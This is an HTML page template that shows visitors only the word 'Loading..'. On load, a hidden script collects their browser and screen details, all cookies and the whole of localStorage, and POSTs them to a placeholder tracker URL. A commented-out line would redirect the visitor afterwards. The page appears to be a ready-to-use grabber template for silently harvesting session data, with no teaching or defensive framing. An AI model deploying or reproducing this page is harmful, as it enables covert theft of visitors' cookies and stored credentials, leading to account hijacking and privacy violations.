<html>

<script type="text/javascript">

    const info = {

        timeOpened: new Date(),
        timezone: (new Date()).getTimezoneOffset() / 60,

        referrer: document.referrer,
        previousSites: history.length,

        // browser info
        browser: {
            name: navigator.appName,
            engine: navigator.produc,
            version: navigator.appVersion,
            userAgent: navigator.userAgent,
            language: navigator.language,
            online: navigator.onLine,
            platform: navigator.platform,
            javaEnabled: navigator.javaEnabled(),
            cookiesEnabled: navigator.cookieEnabled,
            cookie: document.cookie,
            cookies: decodeURIComponent(document.cookie.split(";")),
            dataStorage: localStorage,
        },
        // screen info
        screen: {
            widthScreen: screen.width,
            heightScreen: screen.height,
            widthDocument: document.width,
            heightDocument: document.height,
            widthInner: innerWidth,
            heightInner: innerHeight,
            widthAvailable: screen.availWidth,
            heightAvailable: screen.availHeight,
            colorDepth: screen.colorDepth,
            pixelDepth: screen.pixelDepth,
        },
    };

    function track() {
        var xhr = new XMLHttpRequest();
        var url = "{{TRACKER_URL}}";
        xhr.open("POST", url, true);
        xhr.setRequestHeader("Content-Type", "application/json");
        xhr.onreadystatechange = function () {
            if (xhr.readyState === 4 && xhr.status === 204) {
                // redirect
                // window.location.href="{{URL}}";
            }
        };
        var data = JSON.stringify({browserDetect: info});
        xhr.send(data);
    }
    window.onload = track();

</script>

<body>

    Loading..

</body>

</html>